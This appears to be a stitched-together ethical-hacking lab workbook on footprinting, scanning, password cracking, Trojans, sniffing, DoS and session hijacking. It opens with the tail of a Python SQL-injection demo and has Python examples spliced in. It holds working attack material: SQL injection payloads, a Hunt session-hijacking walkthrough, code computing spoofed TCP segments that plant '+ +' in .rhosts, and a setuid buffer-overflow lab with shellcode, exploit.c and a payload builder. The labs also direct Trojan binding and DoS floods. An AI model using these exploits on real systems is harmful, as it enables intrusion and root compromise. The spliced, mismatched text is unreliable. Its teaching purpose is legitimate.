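Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
"""


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the Users table the ASP page queries.
    (A real application stores a password hash, never the password itself.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('jason', 'S3cret!')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """The ASP page's construction: request values pasted into the SQL text,
    so a quote in the username ends the literal and the rest becomes SQL.
    sqlite3 refuses stacked statements in execute(), so the "'; drop table"
    payload from the log fails here; many other drivers would run it."""
    sql = ("SELECT * FROM Users WHERE Username='" + user
           + "' AND Password='" + pwd + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Parameterised query: the values travel separately from the SQL text,
    so ' or 1=1-- is compared as a username and matches nobody."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (user, pwd)).fetchone() is not None


ATTEMPT_RE = re.compile(r"^Attempted login of unknown user: (?P<user>.*)$")
# Quote, comment marker, statement separator, or tautology/DDL keywords.
INJECTION_RE = re.compile(r"'|--|;|\b(?:or|and)\b\s+\S+=\S+|\bdrop\b", re.IGNORECASE)


def suspicious_usernames(log: str) -> list:
    """Failed-login usernames that carry SQL metacharacters or keywords;
    the earlier probes usually precede the payload that works."""
    found = []
    for line in log.splitlines():
        m = ATTEMPT_RE.match(line)
        if m and INJECTION_RE.search(m["user"]):
            found.append(m["user"])
    return found


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("vulnerable login with payload:", login_vulnerable(db, payload, "x"))
    print("parameterised login with payload:", login_safe(db, payload, "x"))
    print("flagged usernames:", suspicious_usernames(SAMPLE_LOG))
```

Note what the log review cannot tell you: the three flagged attempts all show as "unknown user" because the application only logs the string it received, so whether the tautology payload actually succeeded has to be read from the surrounding "Login of user" lines and the database side, not from these entries.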


Labs Introduction

A Certified Ethical Hacker must possess expert-level skills to successfully attack and defend systems. There is often more than one way to exploit a system, so creativity and ‘out-of-the-box’ thinking are encouraged. These labs are designed not to teach you a specific tool for an exploit, but to give you an opportunity to test out the knowledge and skills you are acquiring in a lab environment.

Exam Relevance

None of these labs are required for you to master in order to pass the C|EH exam.

Software Used in Labs

EC-Council does its best to update the content on the included CDs. In some cases, the tools mentioned in these labs may not be included on the CDs or may be outdated, so if you can’t find a tool on your computer, you may want to download the software from the Internet. Your instructor can help you find the software.

Footprinting

Footprint the http://www.certifiedhacker.com web site.

Suggested tools:

www.dnsstuff.com

Sam Spade

Smart Whois

www.archive.org

www.kloth.net

IP2Country

NewTracePro

Visual Route

www.centralops.net

Which ISP Owns IP

WhereIsIP

What does it mean to footprint a web site?


What is the contact information for this web site?

Where is the web site located?

What is the IP address of this web site?

When was the web site first put up?

How is Footprinting a web site helpful to an ethical or malicious hacker?

Scanning

1) Nmap

Launch a packet sniffer (Ettercap, Ethereal/Wireshark, etc.) and run various Nmap scans against other hosts in the classroom. Watch for RSTs, SYN/ACKs, etc. coming from the host you are scanning.

2) Hping

Read through the Hping2 man page (available online or in Linux).

Perform a port scan on a computer in the classroom.

Experiment with different options in Hping2 to try different types of scans.

Bonus: Read the Hping3 man page. Use Hping3 to scan a computer in the web site.

Do you prefer Hping3 or Hping2? Why?


How could a malicious or ethical hacker use Hping2 or Hping3?

Enumeration

Ask another student or your instructor to set up additional accounts and some shares on their computer.

Enumerate the computer.

What is the SID of the Administrator account?

What users exist on the computer?

What is the password of the Administrator? (Hint: NAT or Venom can help you with this)

How do you test for NULL sessions?

How do NULL sessions help you with hacking?

How do you protect against NULL sessions? (Hint: It can be done in the registry or in the local security policies.)

System Hacking

Password Cracking

Create three additional users on your computer. Assign one user a short dictionary password of less than eight characters. Give a blank password to another. Assign a difficult password to the third.


Get the hash of the Administrator account.

Suggested tools:

L0phtcrack

Pwdump3v2

Ntinfoscan

What is the password to the Administrator account?

When was the Administrator account last changed?

Are you able to get the passwords of the other accounts?

Steganography

Hide the message “you’ve been hacked” on your computer.

Suggested tools:

NTFS Alternate Data Streams

Snow

NT Rootkit

Blindside

Trojans and Backdoors

Launching A Trojan

Take control of another computer using a Trojan or Backdoor. Note: we haven’t covered the different ways of getting a Trojan on another computer yet, so for this lab you may want to work with another student to launch the Trojan on another computer.

Suggested tools:

NetBus

SubSeven

BackOrifice2000


Donald Dick

Beast

Use Netcat to gain shell access to your victim host.

What is the Netcat syntax on the victim host?

Read the Netcat man page. What other things can you do with Netcat?

Can you think of any ways you might get the Trojan on the victim host?

Detecting Trojan Activity

Detect the ports and processes running on your computer. Suggested tools:

Fport

TCP View

What’s on my computer?

Hacker Eliminator

Process Viewer

Windows task manager

Netstat

Did you find any Trojans running on your computer? If so, what ports are they listening on?

Trojan Wrappers

Using Yet Another Binder (YAB), bind a Trojan with a Windows program (such as Solitaire or Calculator).

Sniffers

1) Sniff web traffic on the network. Suggested tools:

Ettercap (Linux)

Windump/tcpdump


Wireshark/Ethereal

2) MSN chat

Work with a partner to set up MSN Messenger on your computers. Launch a sniffer and chat with each other. Can you see each other’s conversation? Download the MSN IM encryption software Simplite (www.secway.fr) and re-launch MSN IM. Can you see each other’s conversation?

3) E-mail

Set up a free e-mail account on mail.com. Configure Outlook Express for your new POP account. Run the sniffer in the background while you send test messages. Can you see your password and/or your e-mail messages?

4) ARP poisoning / MAC flooding

Test out ARP poisoning and/or MAC flooding to capture all traffic. Suggested tools:

Ettercap (Linux)

Macof (Linux)

Cain & Abel

Can you see traffic from other hosts?

Denial Of Service

As a class, agree on a denial of service tool and launch it against a single computer in the classroom. Suggested tools:

DDOSPing

Blast20

Nemesy13

Datapool

If possible, launch multiple processes of these tools. On the victim host, launch task manager and/or performance monitor to see if you are making an impact.


Session Hijacking

The following is from http://www.csn.ul.ie/~syfer/tutorials/sessionhijacking.htm. It requires the use of a hub in the classroom. Depending on your location, you may or may not have a hub.

Session Hijacking

Session hijacking. What a powerful name. For me personally, the name conjures up mental pictures of airplanes with masked gunmen and bomb-laden buses. In actuality, session hijacking is far less physically dangerous but way more financially rewarding.

In a previous article, I discussed ARP poisoning and password detection tools. This takes that article to the next level and discusses how to hijack sessions. Sniffing networks (or ARP poisoning to sniff switched networks) is a great way to collect passwords.

Unfortunately, tools like Dsniff and ettercap aren't always capable of detecting every password that crosses the network. This is where session hijacking can become your friend (or your worst enemy depending on which side of the infosec coin you're on.) In this article I will detail Netflood's test results and the techniques we used to hijack active sessions.

Abstract:

In order to session hijack traffic, multiple attacks or techniques may have to take place. For example, one may have to DoS attack a server in order to keep it from sending RST (reset) packets to the victim. If I were to detail a DoS technique (with every available argument) it would distract thoughts away from the real topic of this article. Some knowledge will have to be gleaned from RFCs, man pages, code comments, by researching on your own, or by merely using your intelligence to conceive of vulnerabilities not discussed herein; hence, the word "primer". No one wrote me a little "session hijacking for dummies" book and I figured it out, so you can too.

Disclaimer:

This paper describes nothing more than some vulnerabilities of the Transmission Control Protocol and tools/thoughts which exploit those vulnerabilities. It is intended for educational use only. You are responsible for what you do with this information. I am no more responsible for people committing crimes with this information than chemistry instructors are responsible for people who construct bombs or chemical warfare devices. [Insert expensive lawyer jargon here to stave off unfounded FBI allegations ala Sil]. All your base are belong to us.

Contents:

A look at TCP

Local Network Session Hijacking

Remote Network Session Hijacking

Defending against session hijack attacks

A Look At TCP

Transmission Control Protocol (TCP) is addressed in RFC 793. For the sake of brevity, I will only cover relevant portions of the RFC, adding information to it when necessary. The Transmission Control Protocol (TCP) is intended for use as a highly reliable host-to-host protocol between hosts in packet-switched computer communication networks, and in interconnected systems of such networks.

TCP must recover from data that is damaged, lost, duplicated, or delivered out of order by the internet communication system. This is achieved by assigning a sequence number to each octet transmitted, and requiring a positive acknowledgment (ACK) from the receiving TCP. If the ACK is not received within a timeout interval, the data is retransmitted. At the receiver, the sequence numbers are used to correctly order segments that may be received out of order and to eliminate duplicates. Damage is handled by adding a checksum to each segment transmitted, checking it at the receiver, and discarding damaged segments.

A fundamental notion in the design is that every octet of data sent over a TCP connection has a sequence number. Since every octet is sequenced, each of them can be acknowledged. The acknowledgment mechanism employed is cumulative so that an acknowledgment of sequence number X indicates that all octets up to but not including X have been received. This mechanism allows for straight-forward duplicate detection in the presence of retransmission. Numbering of octets within a segment is: the first data octet immediately following the header is the lowest numbered, and the following octets are numbered consecutively.

It is essential to remember that the actual sequence number space is finite, though very large. This space ranges from 0 to 4294967295 (2**32)-1. Since the space is finite, all arithmetic dealing with sequence numbers must be performed modulo 2**32 (4294967296). This unsigned arithmetic preserves the relationship of sequence numbers as they cycle from 2**32 - 1 to 0 again. There are some subtleties to computer modulo arithmetic, so great care should be taken in programming the comparison of such values. So you see that the ISN can be any number between 0 and 4294967295. You also hopefully noticed that every octet has a sequence number, not every session. The server (TCPB) will respond to the client (TCPA) with its own sequence number, while acknowledging the client's sequence number. See below for an example:

Sequence prediction to take over networks was first written about in 1985 (or thereabouts) by none other than Robert T. Morris (his son created the first Internet worm). The first attack employing this technique did not occur until Christmas of '94; this is known as the Mitnick hack of Shimomura (or "Christmas hack"). Over the years, OS's have become more random in deriving the ISN, but we all know that computers are not random thinkers. Eventually over time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm. There is a great in-depth article, which can be found here, that explores sequence number generation and prediction in more detail.

Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting data into the communication stream possible, if one were so inclined. The tricky part is not hijacking the session, but in finding out the ISN. Once the ISN (or the ISN increment) is discovered, everything else is gravy.
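The paragraphs above stress that sequence arithmetic is modulo 2**32 and that comparisons need care. The Python below is an added example (editor's code, not part of the article) of that arithmetic: a wrap-safe ordering test, the receive-window acceptance check from RFC 793 that decides whether a segment's sequence number is usable at all, and the handshake numbering in which each side answers with its own ISN while acknowledging the other's ISN+1. The ISNs in it are constructed values.

```python
SEQ_MASK = 0xFFFFFFFF      # sequence numbers live in [0, 2**32)
HALF_SPACE = 0x80000000    # anything this far "ahead" is really behind


def seq_add(seq: int, n: int) -> int:
    """Advance a sequence number by n octets, wrapping at 2**32."""
    return (seq + n) & SEQ_MASK


def seq_diff(a: int, b: int) -> int:
    """Signed distance a - b in the circular space: positive when a is later
    than b, negative when earlier, even across the 2**32 -> 0 wrap."""
    d = (a - b) & SEQ_MASK
    return d - (1 << 32) if d >= HALF_SPACE else d


def seq_lt(a: int, b: int) -> bool:
    """True when a comes before b.  A plain a < b gets this wrong near the
    wrap: 0xFFFFFFF0 is 32 octets before 0x10, not four billion after it."""
    return seq_diff(a, b) < 0


def seq_in_window(seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """RFC 793 acceptance test for the first octet of an arriving segment:
    rcv_nxt <= seq < rcv_nxt + rcv_wnd, evaluated modulo 2**32.  A segment
    that fails this is dropped, so an injected segment must land inside the
    window to be accepted at all."""
    return 0 <= seq_diff(seq, rcv_nxt) < rcv_wnd


def three_way_handshake(isn_a: int, isn_b: int) -> dict:
    """SEQ/ACK numbers of the three handshake segments.  The SYN consumes one
    sequence number on each side, so the first data octet is ISN+1."""
    return {
        "syn":     {"seq": isn_a},
        "syn_ack": {"seq": isn_b, "ack": seq_add(isn_a, 1)},
        "ack":     {"seq": seq_add(isn_a, 1), "ack": seq_add(isn_b, 1)},
    }


if __name__ == "__main__":
    # Constructed ISNs chosen to sit right at the wrap boundary.
    print(three_way_handshake(0xFFFFFFFF, 100))
    print("modular order:", seq_lt(0xFFFFFFF0, 0x10), "plain <:", 0xFFFFFFF0 < 0x10)
    print("in window:", seq_in_window(5, 0xFFFFFFFE, 100))
```

The same window test is what an IDS doing stream reassembly applies to decide which of two competing segments the endpoint will honour; a segment outside the window is discarded by the receiver and should be discarded by the sensor too, otherwise the sensor can be made to see traffic the host never accepts.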

3 requirements to hijack non-encrypted TCP communications:

1. There must be non-encrypted session oriented traffic.

2. Attacker must be able to recognize TCP sequence numbers and predict what the next sequence number will be.

3. Attacker must spoof a host's MAC or IP address to receive communications which are not destined for the attacker's host.

If the attacker is on your local segment, they can sniff the connections and therefore see what the ISN+1 number is; they can also have the traffic routed back to them by poisoning the ARP cache. This is why implementing internal network protocol encryption is so important (albeit rarely done).

Local Network Session Hijacking

Rather than reinvent the wheel, we used a tool that's readily available, called Hunt (downloadable @ netflood.net). We will use the newest version (1.5) because it runs on WindowsME (that's just a joke to get the kiddies' hopes up); you'll actually need Linux or some other *nix variant (though you may have to port Hunt to work with your specific OS). In my case, I have a test machine running Redhat 7.1 and it works fine. You shouldn't have a problem using Hunt with any Linux 2.X kernel.

1. Start hunt

2. Select the "u" option (host up tests). This will enable you to see TCP connections on your network (ie. victims)

3. Enter the victim's IP address or your network address

4. Enter the victim's IP address again or the broadcast address of your local network (This will ensure that our entire network can be victims of this attack).

5. Choose the default answers unless you know what you're doing.

Hunt will now look for victims (based on the range) using a variety of techniques such as ARP broadcasting and pinging.

6. Choosing "yes" for the net ifc promisc test (arp method) option will enable Hunt to do a promiscuous interface test using an ARP broadcast.

7. Pick the default MAC address

8. Hunt will now want to do a promiscuous test using ping; choose "yes" and the default MAC address for the remaining options.

At this point you will be returned to the main menu.

"l" to list all active TCP connections

"w" and choosing a connection will enable you to watch the connection (ie. see all unencrypted communication between the hosts)

Since there is only one TCP session, we'll choose that option by typing "0".

We will be prompted if we want to see just source or destination traffic (client/server) or traffic destined in both directions; choose "both" as only seeing one side of the communication is boring. Don't print both characters, unless you absolutely need to (if you don't know why you'd need to, then you don't need to).

We can now watch the entire communication. So if the victim telnets to a server, we will see him authenticating and doing whatever he decides to do. If he telnets from that server to another server we can watch him log in and get any information we need. We could just sit and watch the communication all night but the problem is the victim is typing extremely slow, and that can be irritating for those of us who type fast. Since that's the case, we should now take over and type for him.

Press control-c and, when prompted, end the show you've just been watching. You will then be presented with the main screen. We are going to do an "arp/simple hijack" so we choose option "a".

We are again presented with a list of TCP sessions. I'll choose option "0" (or whatever communication I choose).

I'm going to spoof all addresses, so I'll use the "yes" defaults.

Any old source MAC address will do, so I'll keep the defaults.

I'll press enter and accept the raw input mode.

Since I want to see everything I will dump all connections.

Choose whether or not to print source and destination same characters; in my case I will choose "no".

I now need to press control-c to input myself into the connection.

An ARP spoof with a destination IP in another network will fail but that's ok because I don't need to spoof the server, I just need to spoof the client to communicate with the server. If it asks you to force the ARP spoof, choose "no" as it's impossible to ARP spoof a client on a remote network.

I have now hijacked the victim's session and I can do anything the user was allowed to do.

You may be asking why you choose any MAC address instead of yours. The answer is because we are cache poisoning the devices which will relay the traffic to us, whether it is a switch, a router, or every host on our network segment. This was covered in a previous netflood article here.

If you are wondering why we shouldn't "force the ARP spoof", keep reading. It's actually fundamental networking concepts. This option would only be valid if we were attempting to hijack a session that was taking place between two hosts on our network segment.

Remote Network Session Hijacking:

This is far more difficult to do today than it was in yesteryear, but it is not impossible. As this is only a "primer", I'm not going to go into exact details for determining an ISN (you can go here for more), but I will give you the fundamental knowledge necessary to help you with the next steps.

Remote Network Session Hijacking (RNSH) leaves the attacker blind. This is why RNSH is also referred to as "blind spoofing". The reason is because we are exploiting trust relationships between client and server on a remote network. The trust relationship is established by the rhosts file created when using services such as rlogin, rsh, or rcp. We cannot spoof a trusted host (found in the rhosts file) on a different network and see the reply packets because they are never routed back to us. We cannot ARP cache poison machines on remote networks because routers do not route ARP broadcasts across the Internet (newbie note: ARP is a layer 2 function, routers work at layer 3). Since we cannot receive the reply traffic we must anticipate the responses from the victim and keep the host we are pretending to be (spoofing) from sending a RST to the victim.

RNSH takes advantage of trust relationships between computers and you are spoofing the trusted client. If the correct spoof rules are configured on edge routers or border gateways, you will have a tremendously hard time performing a RNSH.


Necessary Steps:

1. Gauge the ISN algorithm by connecting to the machine multiple times from a machine which will receive the responses (i.e. not spoofed). You can see the generated ISN by using any number of sniffers available. Sniffers are available from netflood.

1A. From the incremented ISNs, figure out what the next ISN will be. If the increments are not constant (the host randomises its ISNs), the blind attack is not practical.

1B. You will need to create packets in order to initiate the hijack.

2. DoS attack the host we will pretend to be. This makes it unresponsive when the server (victim) sends the SYN-ACK. It also keeps it from sending the dreaded RST (which will become our friend later on in the TCP DoS section).

3. Spoof the IP address of the trusted host and send a SYN at the appropriate time. The ISN in our own SYN can be anything we like; what has to be right is our guess of the server's ISN in the SYN-ACK, which we never see (that's why we did #1). The SYN-ACK goes to the silenced trusted host, which cannot answer.

4. Complete the handshake with a spoofed ACK whose acknowledgment number is the predicted server ISN plus 1, then inject your data on the same connection (echo + + >> ~/.rhosts) -command courtesy of here. With the right sequence and acknowledgment numbers the server places the data into its receive buffer as if it came from the trusted host.

Obviously more commands can be used, and adding "+ +" to .rhosts is only useful in certain situations (it makes the victim trust every user from every host for the r-services, which is what the follow-up rlogin relies on).

The best way for you to see blind spoofing in action is to read Shimomura's breakdown of Mitnick's *cough* alleged *cough* attack.
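The arithmetic behind steps 1A, 3 and 4, as an added Python example (not part of the study guide and not code from any tool it mentions): it checks whether the sampled ISNs grow by a constant, predicts the next one modulo 2^32, and derives the sequence and acknowledgment numbers the spoofed SYN, ACK and data segments must carry. The sampled ISNs, the attacker's own ISN and the injected command are constructed values; a host with a constant 128000 increment per connection is assumed for the sample.

```python
"""Blind (remote) TCP session hijacking arithmetic.
Added example; all sample values are constructed."""

MASK = 0xFFFFFFFF  # TCP sequence numbers are 32-bit and wrap around


def isn_deltas(isns):
    """Differences between consecutive observed ISNs, modulo 2**32."""
    return [(b - a) & MASK for a, b in zip(isns, isns[1:])]


def predict_next_isn(isns):
    """Step 1A: if every delta is identical the generator is predictable and
    the next ISN is last + delta.  Returns None when the deltas vary, i.e. the
    host randomises its ISNs and the blind spoof will not work."""
    deltas = isn_deltas(isns)
    if not deltas or len(set(deltas)) != 1:
        return None
    return (isns[-1] + deltas[0]) & MASK


def blind_spoof_segments(attacker_isn, predicted_server_isn, payload):
    """Steps 3-4: sequence/ack numbers of the three spoofed segments.
    Our SYN carries any ISN we choose; the ACK that completes the handshake
    and the data segment must acknowledge the server's ISN + 1, the value we
    never see and therefore had to predict."""
    syn = {"flags": "S", "seq": attacker_isn & MASK, "ack": 0}
    ack = {"flags": "A",
           "seq": (attacker_isn + 1) & MASK,
           "ack": (predicted_server_isn + 1) & MASK}
    data = {"flags": "PA",
            "seq": (attacker_isn + 1) & MASK,  # first data byte follows our SYN
            "ack": (predicted_server_isn + 1) & MASK,
            "payload": payload}
    return syn, ack, data


# Constructed samples: a host whose ISN grows by exactly 128000 per connection
# (assumed behaviour for the example, sampled as in step 1).
SAMPLED_ISNS = [0x1F2A3000 + n * 128000 for n in range(4)]

if __name__ == "__main__":
    nxt = predict_next_isn(SAMPLED_ISNS)
    print("predicted next server ISN: 0x%08x" % nxt)
    for seg in blind_spoof_segments(0x12345678, nxt, b"echo + + >> ~/.rhosts\n"):
        print(seg)
    # random-looking ISNs give no constant delta, so no prediction
    print(predict_next_isn([0x9AB7E2F1, 0x13C0A55D, 0x7E1120FF]))
```

The wrap-around matters: a sampled sequence that crosses 0xFFFFFFFF still yields a constant delta, and the predicted acknowledgment number is reduced modulo 2^32 as the kernel would compute it.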

Defending against session hijack attacks

1. Use encrypted protocols, like those found in the OpenSSH suite

The OpenSSH suite includes the ssh program which replaces rlogin and telnet, scp which replaces rcp, and sftp which replaces ftp. Also included is sshd which is the server side of the package, and the other basic utilities like ssh-add, ssh-agent, ssh-keygen and sftp-server.

2. Use strong authentication (like Kerberos) or peer-to-peer VPNs.

3. Configure the appropriate anti-spoofing rules on gateways (internal and external).

4. Monitor for ARP cache poisoning, by using IDS products or arpwatch.

Buffer Overflow

1. Start Knoppix


2. Open a command shell

3. At the command prompt type rootme

4. At the command prompt type vi

5. Press the i key to enter insert mode

6. Type the following program

#include <string.h>

int main(int argc, char *argv[])
{
char buffer[500];
/* No length check: an argument longer than 500 bytes runs past the buffer
   and overwrites the saved return address (this is the bug the lab exploits) */
strcpy(buffer, argv[1]);
return 0;
}

7. Press the ESC key

8. Press the : key

9. Type w vuln.c [press enter]

10. Type :q [press enter]

11. At the command prompt type gcc -o vuln vuln.c (the lab assumes a 32-bit system with an executable stack, no stack protector and no ASLR; on a current distribution build with gcc -m32 -fno-stack-protector -z execstack -o vuln vuln.c and turn ASLR off with echo 0 > /proc/sys/kernel/randomize_va_space)

12. At the command prompt type chmod +s vuln (you are root after rootme, so this makes vuln setuid root, which is what the exploit in Lab#2 abuses)

13. At the command prompt type ls -l vuln

14. At the command prompt type ./vuln test [press enter]

Lab#2

1. At the command prompt type vi

2. Press the i key to enter insert mode

3. Type the following program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* setreuid(0,0) followed by execve("/bin/sh"); contains no NUL bytes,
   so strcpy() in vuln copies it intact */
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

/* Returns the current stack pointer: the value is left in EAX, which is
   the return register on 32-bit x86 (compile without optimisation) */
unsigned long sp(void)
{ __asm__("movl %esp, %eax"); }

int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;

offset = 0;
esp = sp();
ret = esp - offset; /* guessed address inside the NOP sled; adjust offset if no shell appears */

printf("Stack Pointer (ESP) : 0x%lx\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%lx\n", ret);

buffer = malloc(600);
ptr = buffer;
addr_ptr = (long *) ptr;

/* fill the whole buffer with the return address, so wherever the saved
   EIP sits past byte 500 of vuln's buffer it is overwritten with ret */
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }

/* 200-byte NOP sled at the front gives the guessed address some slack */
for (i=0; i < 200; i++)
{ buffer[i] = '\x90'; }

/* shellcode immediately after the sled */
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

buffer[600-1] = 0; /* terminator: strcpy() in vuln stops here */

execl("./vuln", "vuln", buffer, (char *) NULL);
free(buffer);
return 0;
}

4. Press the ESC key

5. Press the : key

6. Type w exploit.c [press enter]

7. Type :q [press enter]

8. At the command prompt type gcc -o exploit exploit.c

9. At the command prompt type exit [press enter]

10. At the $ prompt type ./exploit [press enter]

11. At the # prompt type whoami [press enter]

12. At the command prompt type exit [press enter]
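The buffer exploit.c hands to ./vuln, rebuilt in Python as an added example (not the study guide's code) so the layout can be inspected before it is used: a 600-byte buffer sprayed with the little-endian return address, a 200-byte NOP sled, the shellcode right after the sled, and the final byte dropped where exploit.c writes its terminating 0. It also performs the one check the C code skips: strcpy() (and the argv array) stops at the first NUL byte, so a return address such as 0xbfff0000 silently truncates the payload. The return address 0xbffff8a0 below is an assumed value; take the real one from the "Desired Return Addr" line exploit.c prints.

```python
"""Layout and sanity check of the exploit.c payload.  Added example; the
return addresses used here are assumed, not taken from a real run."""
import struct

# The study guide's shellcode: setreuid(0,0) + execve("/bin/sh"), NUL-free.
SHELLCODE = (b"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
             b"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
             b"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
             b"\x68")

BUFSIZE = 600   # malloc(600) in exploit.c
SLED = 200      # NOPs at the front of the buffer


def build_payload(ret, shellcode=SHELLCODE, bufsize=BUFSIZE, sled=SLED):
    """Same layout as exploit.c: bufsize bytes filled with the little-endian
    return address, the first `sled` bytes replaced by 0x90, the shellcode
    right after the sled, and the last byte dropped (buffer[599] = 0)."""
    buf = bytearray(struct.pack("<I", ret) * (bufsize // 4))
    buf[:sled] = b"\x90" * sled
    buf[sled:sled + len(shellcode)] = shellcode
    return bytes(buf[:bufsize - 1])


def first_nul(payload):
    """Offset of the first NUL byte, or -1.  Anything past a NUL never reaches
    vuln's buffer: argv cannot carry it and strcpy() would stop there anyway."""
    return payload.find(b"\x00")


def ret_slots(payload, sled=SLED, shellcode=SHELLCODE):
    """4-byte aligned offsets that still hold the return address after the
    sled and shellcode were written; one of them must line up with the
    saved EIP beyond vuln's 500-byte buffer for the exploit to work."""
    start = sled + len(shellcode)
    start += (-start) % 4
    return list(range(start, len(payload) - 3, 4))


if __name__ == "__main__":
    for ret in (0xBFFFF8A0, 0xBFFF0000):   # assumed addresses, see lead-in
        p = build_payload(ret)
        print("ret 0x%08x: %d bytes, first NUL at %d, %d ret slots"
              % (ret, len(p), first_nul(p), len(ret_slots(p))))
```

Spraying the return address over the whole tail of the buffer is what lets exploit.c work without knowing the exact distance from buffer[0] to the saved EIP; the check in first_nul() is what you run before trying a new offset, because a truncated payload looks exactly like a wrong guess.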

Hacking Web Servers

Use IIS5-Koei to TFTP Netcat onto a victim host. Using Netcat, gain shell access to the computer.

Note: you will need to use a TFTP server for this lab. Ask your instructor if you get stuck.

Web Application Vulnerabilities Lab#1


Download Teleport Pro at http://www.tenmax.com/teleport/pro/home.htm

Copy a web site and examine the files.

How do you think a hacker could use a tool like this for malicious purposes?

Lab#2

Use the Metasploit command line and web interface to hack into another machine. Experiment

with different options.

Linux Hacking

Open Linux and run tcpdump from the command line. Try out the following options. (You may want to generate some traffic from your machine in order to capture traffic.)

To list the available interfaces: tcpdump -D
To show all traffic on eth1: tcpdump -i eth1
To capture just TCP (filter keywords are lowercase): tcpdump tcp
To capture just UDP: tcpdump udp
To capture just one port: tcpdump port 23
To dump to a pcap file: tcpdump -i eth0 -w test.pcap
To read back the packet file: tcpdump -r test.pcap
To capture only src IP, dst IP and protocol, and suppress DNS lookups: tcpdump -i eth1 -nn -q
Read back the packet file but suppress DNS lookups: tcpdump -nnr test.pcap
As above but print the timestamp in an easy format (date and time): tcpdump -ttttnnr test.pcap
To collect only 20 packets: tcpdump -c 20 -i eth0
Show MAC addresses in the output: tcpdump -e -i eth0
To capture packets based on Ethernet MAC address: tcpdump ether src 00:18:4d:18:c0:b8
To listen to a specific TCP port: tcpdump -w test.pcap -i eth1 tcp port 6881
To also display the payload of the packet in hex: tcpdump -i eth1 -x
To display the payload in hex and ASCII: tcpdump -i eth1 -xX
To listen on TCP port 6881 or UDP ports 33210 or 33220: tcpdump -w test.pcap -i eth1 tcp port 6881 or udp port \( 33210 or 33220 \)
Capture any traffic destined for 10.168.28.22 on TCP port 22: tcpdump -w test.pcap dst 10.168.28.22 and tcp port 22
Capture any traffic from source 10.168.28.22 on TCP port 22: tcpdump -w test.pcap src 10.168.28.22 and tcp port 22
Older tcpdump versions default to a small snapshot length (96 bytes) that truncates packets; -s changes it (current versions capture whole packets by default): tcpdump -w test.pcap -s 1550 dst 10.168.28.22 and tcp port 22
Top talkers on the network (source addresses seen more than 100 times in 20000 packets): tcpdump -tnn -c 20000 -i eth0 | awk -F "." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr | awk ' $1 > 100 '
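What the top-talkers pipeline above actually does, as an added Python example (not part of the study guide): it parses the `tcpdump -tnn` line format (no timestamps, no name resolution) into source, ports, destination and protocol, counts packets per source address and applies the same "more than N" threshold as the trailing awk. The capture lines are constructed for the example; a real run would feed `tcpdump -tnn -c 20000 -i eth0` output into top_talkers().

```python
"""Parse `tcpdump -tnn` text output and rank source addresses.
Added example; the sample capture below is constructed."""
import re
from collections import Counter

# Constructed sample of `tcpdump -tnn` output: TCP, UDP, ICMP and one
# non-IP (ARP) line, which the parser must skip.
SAMPLE = """\
IP 10.168.28.5.51234 > 10.168.28.22.22: Flags [S], seq 1000, win 64240, length 0
IP 10.168.28.22.22 > 10.168.28.5.51234: Flags [S.], seq 2000, ack 1001, win 65535, length 0
IP 10.168.28.5.51234 > 10.168.28.22.22: Flags [.], ack 1, win 502, length 0
IP 10.168.28.5.51234 > 10.168.28.22.22: Flags [P.], seq 1:22, ack 1, win 502, length 21
IP 10.168.28.9.5353 > 224.0.0.251.5353: UDP, length 44
IP 10.168.28.9 > 10.168.28.22: ICMP echo request, id 7, seq 1, length 64
IP 10.168.28.22 > 10.168.28.9: ICMP echo reply, id 7, seq 1, length 64
ARP, Request who-has 10.168.28.22 tell 10.168.28.5, length 28
"""

# "IP a.b.c.d[.port] > a.b.c.d[.port]: <rest>"; the port is absent for ICMP.
LINE_RE = re.compile(
    r"^IP (\d+(?:\.\d+){3})(?:\.(\d+))? > (\d+(?:\.\d+){3})(?:\.(\d+))?: (\S+)")


def parse_line(line):
    """Return (src_ip, src_port, dst_ip, dst_port, proto), or None for a
    line that is not an IPv4 packet."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, sport, dst, dport, rest = m.groups()
    proto = "TCP" if rest.startswith("Flags") else rest.rstrip(",")
    return (src, int(sport) if sport else None,
            dst, int(dport) if dport else None, proto)


def top_talkers(text, threshold=0):
    """Packets per source IP, most active first, like
    `awk -F. ... | sort | uniq -c | sort -nr | awk '$1 > threshold'`."""
    counts = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec:
            counts[rec[0]] += 1
    return [(ip, n) for ip, n in counts.most_common() if n > threshold]


if __name__ == "__main__":
    for ip, n in top_talkers(SAMPLE):
        print("%6d %s" % (n, ip))
```

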